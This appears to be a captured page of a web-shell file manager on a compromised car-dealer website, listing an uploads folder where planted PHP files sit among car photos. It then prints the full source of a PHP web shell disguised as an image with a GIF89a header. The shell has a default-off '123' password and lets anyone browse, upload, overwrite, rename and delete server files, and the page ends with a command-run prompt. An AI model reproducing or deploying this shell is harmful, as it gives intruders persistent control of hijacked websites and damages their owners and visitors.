/
var
/
www
/
vhosts
/
m-auto.co
/
httpdocs
/
uploads
/
cars
/
/var/www/vhosts/m-auto.co/httpdocs/uploads/cars
mkdir
upload
Name
Size
Mode
Actions
ALFA_DATA/
-
0755
rm
gallery/
-
0755
rm
videos/
-
0755
rm
xaivhost/
-
0755
rm
6a3a92d0a3213-large (9).jpg
21257
0644
edit
dl
rm
6a3a92d0aedee-large (8).jpg
16758
0644
edit
dl
rm
6a3a92d0af1ed-large (7).jpg
19827
0644
edit
dl
rm
6a3a92d0af56b-large (6).jpg
24868
0644
edit
dl
rm
6a3a92d0b0bdf-large (4).jpg
22852
0644
edit
dl
rm
6a3a92d0b07f9-large (5).jpg
25392
0644
edit
dl
rm
6a3a92d0b1c85-large.jpg
17723
0644
edit
dl
rm
6a3a92d0b103c-large (3).jpg
27617
0644
edit
dl
rm
6a3a92d0b1501-large (2).jpg
28805
0644
edit
dl
rm
6a3a92d0b1891-large (1).jpg
29143
0644
edit
dl
rm
6a26e02843256-thumbnail (1).jpg
4001
0644
edit
dl
rm
6a26e02845c8b-thumbnail (2).png
18118
0644
edit
dl
rm
6a26e02845552-thumbnail (1).png
26656
0644
edit
dl
rm
6a26e02845948-thumbnail (2).jpg
4554
0644
edit
dl
rm
6a26e02846a63-thumbnail (5).jpg
4145
0644
edit
dl
rm
6a26e02846e59-thumbnail.jpg
4584
0644
edit
dl
rm
6a26e028460f7-thumbnail (3).jpg
4261
0644
edit
dl
rm
6a26e028466c0-thumbnail (4).jpg
3913
0644
edit
dl
rm
6a26e028472a4-thumbnail.png
22115
0644
edit
dl
rm
6a31a733ed8ce-large (4).jpg
27079
0644
edit
dl
rm
6a31a733edd83-large (3).jpg
30600
0644
edit
dl
rm
6a31a733ee1d1-thumbnail (4).jpg
2897
0644
edit
dl
rm
6a31a733ee65a-thumbnail (3).jpg
3459
0644
edit
dl
rm
6a31a733eea70-thumbnail (2).jpg
3512
0644
edit
dl
rm
6a31a733eee7b-thumbnail (1).jpg
3894
0644
edit
dl
rm
6a31a733ef6b7-large (2).jpg
25975
0644
edit
dl
rm
6a31a733ef29d-thumbnail.jpg
3659
0644
edit
dl
rm
6a31a733efb94-large (1).jpg
29599
0644
edit
dl
rm
6a31a733eff7e-large.jpg
31400
0644
edit
dl
rm
6a31a733f0333-large.png
156970
0644
edit
dl
rm
6a52a7a34fec1-rayea.php
20526
0644
edit
dl
rm
6a52a7a864640-rayea.php.png
20526
0644
edit
dl
rm
6a52a78321d54-claw.php.png
11821
0644
edit
dl
rm
6a315f0883b5c-large (3).jpg
36959
0644
edit
dl
rm
6a315f0884bd8-large.png
81324
0644
edit
dl
rm
6a315f0884027-large (2).jpg
37193
0644
edit
dl
rm
6a315f0884477-large (1).jpg
30603
0644
edit
dl
rm
6a315f088480d-large.jpg
25436
0644
edit
dl
rm
6a315f0885149-YY.png
90060
0644
edit
dl
rm
6a315f08855e2-555.png
8593
0644
edit
dl
rm
68ee3c4d3a85d-68e05ca7880a3_1759534247.png
332042
0644
edit
dl
rm
690b2ba457763-big-up_88d27acce3eb5945acc41187dfba659c.png
215437
0644
edit
dl
rm
690b5b79dc93b-هيونداي إلنترا اتش دى6.png
27881
0644
edit
dl
rm
690b5b79dcf42-هيونداي إلنترا اتش دى5.jpg
7669
0644
edit
dl
rm
690b5b79dd588-هيونداي إلنترا اتش دى4.jpg
8797
0644
edit
dl
rm
690b5b79ddb3b-هيونداي إلنترا اتش دى3.jpg
8221
0644
edit
dl
rm
690b5b79de08e-هيونداي إلنترا اتش دى2.jpg
8136
0644
edit
dl
rm
690b5b79de591-هيونداي إلنترا اتش دى1.jpg
10853
0644
edit
dl
rm
690b5d305a554-هيونداي اكسنت4.jpg
10096
0644
edit
dl
rm
690b5d305ab60-هيونداي اكسنت3.jpg
9555
0644
edit
dl
rm
690b5d305b1cd-هيونداي اكسنت2.jpg
10340
0644
edit
dl
rm
690b5d305b80b-هيونداي اكسنت1.jpg
11656
0644
edit
dl
rm
690b5d3059fe3-هيونداي اكسنت5.jpg
16237
0644
edit
dl
rm
690b5d3059256-هيونداي اكسنت7.jpg
11026
0644
edit
dl
rm
690b5d3059949-هيونداي اكسنت6.jpg
12415
0644
edit
dl
rm
690b24b2dea8b-هيونداي إلنترا اتش دى 2024.png
165654
0644
edit
dl
rm
690b29fc4a89b-هيونداي إلنترا اتش دى 2024.png
165654
0644
edit
dl
rm
690b35f10a3ba-هيونداي اكسنت5.jpg
16237
0644
edit
dl
rm
690b35f10a94d-هيونداي اكسنت4.jpg
10096
0644
edit
dl
rm
690b35f10aeb0-هيونداي اكسنت3.jpg
9555
0644
edit
dl
rm
690b35f10b3c9-هيونداي اكسنت2.jpg
10340
0644
edit
dl
rm
690b35f10b8eb-هيونداي اكسنت1.jpg
11656
0644
edit
dl
rm
690b35f109e04-هيونداي اكسنت6.jpg
12415
0644
edit
dl
rm
690b35f109849-هيونداي اكسنت7.jpg
11026
0644
edit
dl
rm
690b46db22b9a-هيونداي اكسنت7.jpg
11026
0644
edit
dl
rm
690b46db24cde-هيونداي اكسنت2.jpg
10340
0644
edit
dl
rm
690b46db232be-هيونداي اكسنت6.jpg
12415
0644
edit
dl
rm
690b46db2466f-هيونداي اكسنت3.jpg
9555
0644
edit
dl
rm
690b46db23939-هيونداي اكسنت5.jpg
16237
0644
edit
dl
rm
690b46db24053-هيونداي اكسنت4.jpg
10096
0644
edit
dl
rm
690b46db25360-هيونداي اكسنت1.jpg
11656
0644
edit
dl
rm
690b332e5c4c5-7.jpg
8510
0644
edit
dl
rm
690b332e5cbcf-6.jpg
13180
0644
edit
dl
rm
690b332e5d8a1-4.jpg
13948
0644
edit
dl
rm
690b332e5d258-5.jpg
9356
0644
edit
dl
rm
690b332e5de3b-3.jpg
7646
0644
edit
dl
rm
690b332e5e8cc-1.jpg
10554
0644
edit
dl
rm
690b332e5e39a-2.jpg
6460
0644
edit
dl
rm
690b332e5edb4-big-up_61e2fc41b473f7f7a4b5801a8e5784f1.png
243728
0644
edit
dl
rm
690b20351fe01-big-up_88d27acce3eb5945acc41187dfba659c.png
215437
0644
edit
dl
rm
690b47692f74d-هيونداي إلنترا اتش دى 2024.png
165654
0644
edit
dl
rm
690b5309451de-هيونداي إلنترا اتش دى 2024.png
165654
0644
edit
dl
rm
mmrp.php
463765
0644
edit
dl
rm
plugins.php
90481
0644
edit
dl
rm
vhost.php
5869
0644
edit
dl
rm
Edit:
/var/www/vhosts/m-auto.co/httpdocs/uploads/cars/6a52a78321d54-claw.php.png
(11821B)
GIF89a; <? # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>eclass.unmer.ac.id</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php //function function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($file == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } if ($ext == "html" || $ext == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($ext == "php" || $ext == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($ext, $imgs)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($ext == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($ext == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($ext, $audio)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($ext == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($ext == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } function encodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET['p'])) { if (empty($_GET['p'])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET['p']))) { echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>"); } elseif (is_dir(decodePath($_GET['p']))) { $p = decodePath($_GET['p']); } } elseif (isset($_GET['q'])) { if (!is_dir(decodePath($_GET['q']))) { echo ("<script>window.location.replace('?p=');</script>"); } elseif (is_dir(decodePath($_GET['q']))) { $p = decodePath($_GET['q']); } } else { $p = $root_path; } define("PATH", $p); echo (' <nav class="navbar navbar-light" style="background-color: #e3f2fd;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a> '); $path = str_replace('\\', '/', PATH); $paths = explode('/', $path); foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { $a = true; echo "<a href=\"?p=/\">/</a>"; continue; } if ($dir_part == '') continue; echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "ঘ", $paths[$i]); if ($i != $id) echo "ক"; } echo "'>" . $dir_part . "</a>/"; } echo (' </div> <div class="form-inline"> <a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a> <a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div> </nav>'); if (isset($_GET['p'])) { //fetch files if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == '.' || $obj == '..') { continue; } $new_obj = PATH . '/' . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ' <table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody> '; foreach ($folders as $folder) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td> <td><b>---</b></td> <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } foreach ($files as $file) { echo " <tr> <td>" . fileIcon($file) . $file . "</td> <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td> <td>0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } echo " </tbody> </table>"; } else { if (empty($_GET)) { echo ("<script>window.location.replace('?p=');</script>"); } } if (isset($_GET['upload'])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET['r'] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; if (isset($_POST['rename'])) { $name = PATH . "/" . $_GET['r']; if(rename($name, PATH . "/" . $_POST['name'])) { echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } } if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; if(isset($_POST['edit'])) { $filename = PATH."/".$_GET['e']; $data = $_POST['data']; $open = fopen($filename,"w"); if(fwrite($open,$data)) { echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script> </body> </html>
Save
cmd:
run